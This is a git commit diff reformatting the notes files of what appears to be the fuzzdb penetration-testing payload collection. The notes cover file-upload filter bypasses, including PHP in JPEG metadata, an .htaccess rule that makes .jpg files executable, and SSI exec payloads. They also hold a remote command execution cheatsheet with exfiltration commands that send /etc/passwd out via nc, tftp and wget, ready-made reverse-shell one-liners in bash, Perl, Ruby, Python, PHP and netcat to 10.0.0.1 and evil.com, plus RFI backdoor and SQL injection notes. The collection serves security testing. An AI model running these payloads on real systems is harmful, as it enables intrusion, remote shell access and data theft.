This commit is contained in:
Adam Muntner 2015-09-24 09:25:24 -04:00
commit 95e3f3d1ad
8 changed files with 159 additions and 130 deletions

View file

@ -1,13 +1,17 @@
Notes:
source-disc-cmd-exec-traversal.txt
single directory traversals that have caused showcode or command exec issues in the past
GET /path/*payload*relative/path/to/target/file/
**source-disc-cmd-exec-traversal.txt**
single directory traversals that have caused showcode or command exec issues in the past
``` GET /path/*payload*relative/path/to/target/file/ ```
**source-disclosure-generic.txt**
source-disclosure-generic.txt
known cross platform source Code, file disclosure attack patterns - append after file or dir path
source-disclosure-microsoft.txt
**source-disclosure-microsoft.txt**
microsoft-specific - appends after filename - try the generic list for microsoft, too

View file

@ -1,74 +1,94 @@
# File Upload Fuzzfiles- File Name Filter Bypass Notes
File Upload Fuzzfiles- File Name Filter Bypass Notes
see: http://cwe.mitre.org/data/definitions/434.html
# kinds of file upload verifications:
# content-type
# filename extension verificationi (whitelist, blacklist)
# file content checking
# client side, ha ha ha
* kinds of file upload verifications:
* content-type
* filename extension verificationi (whitelist, blacklist)
* file content checking
* client side, ha ha ha
File notes:
alt-extensions-asp.fuzz.txt
alt-extensions-coldfusion.fuzz.txt
alt-extensions-jsp.fuzz.txt
alt-extensions-perl.fuzz.txt
alt-extensions-php.fuzz.txt
# Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters
**alt-extensions-asp.fuzz.txt**
file-ul-filter-bypass-commonly-writable-directories.fuzz.txt
# File directory names that experience has shown are often writable
**alt-extensions-coldfusion.fuzz.txt**
file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt
# {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
**alt-extensions-jsp.fuzz.txt**
file-ul-filter-bypass-microsoft-asp.fuzz.txt
# this file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile - {ASPSCRIPT} gets regex replaced.
**alt-extensions-perl.fuzz.txt**
file-ul-filter-bypass-ms-php.fuzz.txt
file-ul-filter-bypass-x-platform-php.fuzz.txt
# php on microsoft, cross-platform. use both on ms.
# Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
# -----
#<?php phpinfo(); ?>
#-----
# then regex replace {PHPSCRIPT} with the name of your .jpg file in the target directory
**alt-extensions-php.fuzz.txt**
Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters
invalid-filenames-microsoft.fuzz.txt
# Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
# regex replace {EXT} with allowed extension type
**file-ul-filter-bypass-commonly-writable-directories.fuzz.txt**
file-ul-filter-bypass-x-platform-generic.fuzz.txt
# These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype
# regex replace {PHPSCRIPT} with your script name
File directory names that experience has shown are often writable
invalid-filenames-linux.fuzz.txt
# invalid filenames under linux, and since there aren't too many of those, other filepaths that may cause problems. # these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
**file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt**
``` {ASPSCRIPT} ``` gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
invalid-filesystem-chars-microsoft.fuzz.txt
# list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
# fuzz these into a filename during upload attempts
**file-ul-filter-bypass-microsoft-asp.fuzz.txt**
this file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile - ``` {ASPSCRIPT} ``` gets regex replaced.
**file-ul-filter-bypass-ms-php.fuzz.txt**
## Addtl Tips:
**file-ul-filter-bypass-x-platform-php.fuzz.txt**
# For mod_cgi Server Side Include upload attacks:
<!--#exec cmd="ls" -->
php on microsoft, cross-platform. use both on ms.
# or, on Windows
Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
<!--#exec cmd="dir" -->
``` <?php phpinfo(); ?> ```
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
# try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the
# list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
then regex replace ``` {PHPSCRIPT} ``` in the fuzzfile payload with the name of your .jpg file in the target directory
**invalid-filenames-microsoft.fuzz.txt**
Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
regex replace ``` {EXT} ``` with allowed extension type
**file-ul-filter-bypass-x-platform-generic.fuzz.txt**
These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype
regex replace ``` {PHPSCRIPT} ``` with your script name
**invalid-filenames-linux.fuzz.txt**
invalid filenames under linux, and since there aren't too many of those (there's one), other filepaths that may cause problems. these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
**invalid-filesystem-chars-microsoft.fuzz.txt**
list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. fuzz these into a filename during upload attempts
**Addtl Tips:**
**For mod_cgi Server Side Include upload attacks:**
``` <!--#exec cmd="ls" --> ```
or, on Windows
``` <!--#exec cmd="dir" --> ```
Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the
list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
** example .htaccess entry that sets mime type .jpg to be executable:**
``` AddType application/x-httpd-php .jpg ```
# example .htaccess entry that sets mime type .jpg to be executable:
-----
AddType application/x-httpd-php .jpg
-----

View file

@ -1,93 +1,90 @@
Remote Command Exec Cheatsheet
File notes:
File notes
source-disc-cmd-exec-traversal.fuzz.txt
# single directory traversals that have caused showcode or command exec issues in the past
# GET /path/*payload*relative/path/to/target/file/
**source-disc-cmd-exec-traversal.fuzz.txt**
usage
```GET /path/*payload*relative/path/to/target/file/```
Executing Commands
**Executing Commands**
Seperating Commands:
blah;blah2
Seperating Commands
``` blah;blah2 ```
PIPEZ:
blah ^ blah2
PIPES
``` blah ^ blah 2```
AND:
blah && blah2
AND
```blah && blah2```
OR:
FAIL || X
OR
```FAIL || X```
OR:
blah%0Dblah2%0Dblah3
OR
``` blah%0Dblah2%0Dblah3 ```
Backtick:
`blah`
Backtick
``` `blah` ```
Background:
`blah & blah2`
Background
``` `blah & blah2` ```
**Exfiltrating Files / Data**
Exfiltrating Files / Data
FTP:
FTP
Make a new text file, and echo and then redirect to FTP
NC:
nc -e /bin/sh
NC
``` 'nc -e /bin/sh' ```
NC:
echo /etc/passwd | nc host port
NC
``` 'echo /etc/passwd | nc host port' ```
TFTP:
echo put /etc/passwd | tftp host
TFTP
``` 'echo put /etc/passwd | tftp host' ```
WGET:
wget --post-file /etc/passwd
``` 'wget --post-file /etc/passwd' ```
**One-Liner Reverse Shells**
One-Liner Reverse Shells
On the listener:
$ nc -l -p 8080 -vvv
On the listener
``` $ nc -l -p 8080 -vvv' ```
On the remote host...
Bash:
$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
``` $ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ```
$ exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done
``` $ exec 5<>/dev/tcp/evil.com/8080 ```
'$ cat <&5 | while read line; do $line 2>&5 >&5; done'
Perl:
$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl
```$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ```
Ruby:
$ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Ruby
``` $ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ```
Python:
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Python
``` $ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ```
PHP:
$ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
PHP
``` $ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ```
(Assumes TCP uses file descriptor 3. It it doesn't work, try 4,5, or 6)
Netcat:
$ nc -e /bin/sh 10.0.0.1 1234
Netcat
``` $ nc -e /bin/sh 10.0.0.1 1234 ```
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
``` $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f ```
```
XTERM:
Server:
$ xterm -display 10.0.0.1:1
Listener:
$ Xnest :1
$ xhost +targetip
```

View file

@ -1,4 +1,5 @@
traversals-8-deep-exotic-encoding.fuzz.txt
# Use Regex to replace {FILE} with your target filename
**traversals-8-deep-exotic-encoding.fuzz.txt**
Use Regex to replace {FILE} with your target filename

View file

@ -1,12 +1,18 @@
rfi.fuzz.txt
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
Remote File Include scanning
Compiled by RSnake 02/01/2010
Mostly from milw0rm osvdb.org and elsewhere
Change XXpathXX to the path of your backdoor.
Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own XXpathXX URL:
XXpathXX => http://www.example.com/hax.txt?
see fuzzdb docs:
see:
/docs/attack-docs/rfi-cheatsheet.html
Other tools:

View file

@ -1,6 +1,7 @@
MSSQL.fuzz.txt
# you will need to customize/modify some of the vaules in the queries for best effect
**MSSQL.fuzz.txt**
you will need to customize/modify some of the vaules in the payload queries for best effect

View file

@ -1,18 +1,18 @@
various useful post-exploitation commands
ms-sql-enumeration.fuzz.txt
# ms-sqli info disclosure payload fuzzfile
# replace regex with your fuzzer for best results <attackerip> <sharename>
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
# might need to terminate payloads with ;--
**ms-sql-enumeration.fuzz.txt**
* ms-sqli info disclosure payload fuzzfile
* replace regex with your fuzzer for best results <attackerip> <sharename>
* run wireshark or tcpdump, look for incoming smb or icmp packets from victim
* might need to terminate payloads with ;--
mysql-injection-login-bypass.fuzz.txt
# regex replace as many as you can with your fuzzer for best results:
# <user-fieldname> <pass-fieldname> <username>
# also try to brute force a list of possible usernames, including possile admin acct names
**mysql-injection-login-bypass.fuzz.txt**
* regex replace as many as you can with your fuzzer for best results:
* <user-fieldname> <pass-fieldname> <username>
* also try to brute force a list of possible usernames, including possile admin acct names
mysql-read-local-files.fuzz.txt
# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
**mysql-read-local-files.fuzz.txt**
* mysql local file disclosure through sqli
* fuzz interesting absolute filepath/filename into <filepath>

View file

@ -1,5 +1,5 @@
# some files generated with cms-explorer
http://code.google.com/p/cms-explorer/
use these for q&d but cms explorer does a lot more
**CMS files generated with cms-explorer** http://code.google.com/p/cms-explorer/
use the provided lists for q&d but cms explorer does a lot more.
# wordpress.fuzz.txt generating by cat >>, sort, uniq of multiple versions of wordpress for wordpress into one fuzzfile, for maximum detection in full effect, yo
**wordpress.fuzz.txt**
generated by bringing the filenames from each incremental new version of wordpress into one fuzzfile